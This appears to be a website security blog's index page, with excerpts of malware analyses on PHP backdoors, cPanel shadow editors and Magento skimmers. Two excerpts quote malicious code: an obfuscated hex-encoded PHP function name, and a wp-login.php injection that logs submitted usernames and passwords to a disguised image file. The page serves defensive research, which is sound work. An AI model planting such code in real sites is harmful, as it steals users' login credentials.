Website Security News
We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late 2018 – as we mentioned in a blog post at the time. This variant tries to hide by compressing and…
The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During a recent investigation, we found…
We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for all of the email accounts…
Read More about Yet another variant of the cPanel user shadow editor malware
Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has,…
A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack in Server Logs: March 2019…
Editorial: This post was last updated October 11th, 2022. DDoS attacks are a growing threat for websites. But do you know how to stop them in their tracks? We’ll cover…
We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning tools. $a = “\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73”; $b…
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time); /** Code injection in wp-login.php…
This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use comments or other text within…
Read More about “Loader for Secured Files” and arrayed b374k shell encoding
While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer to these types of files…
We were recently contacted by a Magento website owner who had been blacklisted and was experiencing McAfee SiteAdvisor “Dangerous Site” warnings. Our investigation revealed that the site had been infected…
Read More about Fake Google Domains Used in Evasive Magento Skimmer
